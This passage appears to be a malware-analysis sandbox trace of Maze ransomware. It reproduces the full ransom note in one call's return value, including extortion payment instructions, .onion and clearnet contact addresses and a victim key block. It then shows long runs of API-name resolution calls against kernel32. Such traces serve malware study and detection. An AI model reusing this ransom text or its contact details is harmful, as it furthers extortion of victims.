xUX4Ifx9Y1Ee54/BfonTTd3V6SDG9swfJRm8IvoSOhIqwJbERSM1lb91BrQyNHUPc+ATkYuB3CHxa9h+rJZGaE/MaytdSkjSPZF8xCWBvqIhaLgu2TCMYdJrVtRZyEs+G8R7JzU1zppCj3TMjRisS0C5vcuT6p6npiTEVQZ0RjSFmp57a4onMw4hy7kO98H/yaJfa/9jvnuMg/yOrS/sE0fk7MQUn7QbOy4YVdfEURHMBuzF6RcyH08o7q71oflLpJmqDw5357A6mtWv052N8rpV9PnCXuf4D7I3aWEwb5kDkOg37+MQzcuamSeRMDDU4xKUfszFm99Se+7DU7KHgz/xS9OnreaGVvoyeD6Wo/+2ySbTiofDJ00u9w4pQ8carEc87DMDr6HSi7D0tB4qKfmlOwoeD+wQVdxnH6m+Oe0fpWhk7xBvssGNw4coIY4J4rQx3e0Mda84GHHB8YQN4s5fsDhYijiQatKqvs+eaMdYiMFKqJV9DRoBkStGooClvOh2LwVMPe4aJufA2ECH4zkMHJRZUTqB/bHAacGN2baG8ivcwJsnYj2dsc93tzJDCkmxyIMqbtyqmTRJIvEv4K51A3dZDD2dvx/oHCjbIUfL9N9vr8vnejMVI2XJVafVhAs1C3/CUyOsrhrSH2/BaeNuSjCgEBQH3JVNd5wuQ6V+fFQjCmE23nFn/RXrWhl5gd5fiSFrvPREpiH+BeCGnpiTiTGjIHL7VAYhu7DQ6KVo54swkswxLclqpopQGLaeTCuh5D+OXiUsXA2Ygd3olJfrivH8eyrZPA/oLFa19eWWh1PQktd8D5NsrjvgYjNJqtOPsnyK2KvLeWbqUY9RYE3LD1IbT2UgH55Ehut6m83FzItZdf4gMoU8hRL4IpCCUHjWMANC6p8OMaCgYpUxKBqlhqCtV/ju2IlDJPGh2rx/+55q29Uk6N8I1nW6fSR8XpnoNMtsMWGmbfGiLJM5zs1TWLWKpZFsrdobiUUPRM5WnYBO0OphCz4Yc6H0wjragoiOQBjAGQAYQAwADkAZgAyADkAYwAzADUANABiADQAMgAAABCAQBoqNQBwADUATgByAEcASgBuADAAagBTACAASABBAEwAUABtAGMAeAB6AAAAIhRYAEQAVQBXAFQARgBPAE4ATwAAACoMbgBvAG4AZQB8AAAAMi5XAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsAAAAQih8AEMAXwBGAF8ANQAwADUANgAzADAALwA1ADIAMwA5ADcAOQB8AAAASABQQFiJCGCJCGiJCHD6gM0IeAyAAQGKAQMyLjA=") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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" [0178.541] lstrlenA (lpString="kernel32.dll") returned 12 [0178.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.541] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.541] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.541] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.541] lstrlenA (lpString="ADDATOMA") returned 8 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.541] lstrlenA (lpString="ADDATOMW") returned 8 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.541] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.541] lstrcpyA (in: lpString1=0x239db34, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.541] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.542] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.542] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.542] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.542] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.542] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.542] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.542] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.542] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.542] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.542] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.542] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.542] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.542] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.542] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.542] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.542] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.542] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.542] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.542] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.542] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.543] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.543] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.543] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.543] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.543] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.543] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.543] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.543] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.543] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.543] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.543] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.543] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.543] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.543] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.543] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.543] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.543] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.543] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.543] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.544] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.544] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.544] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.544] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.544] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.544] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.544] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.544] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.544] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.544] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.544] lstrlenA (lpString="BEEP") returned 4 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.544] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.544] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.544] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.544] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.544] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.544] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.544] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.544] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.544] lstrcpyA (in: lpString1=0x239db34, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.545] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.545] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.545] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.545] lstrlenA (lpString="CANCELIO") returned 8 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.545] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.545] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.545] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.545] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.545] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.545] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.545] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.545] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.545] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.545] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.545] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.545] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.545] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.545] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.545] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.546] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.546] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.546] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.546] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.546] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.546] lstrlenA 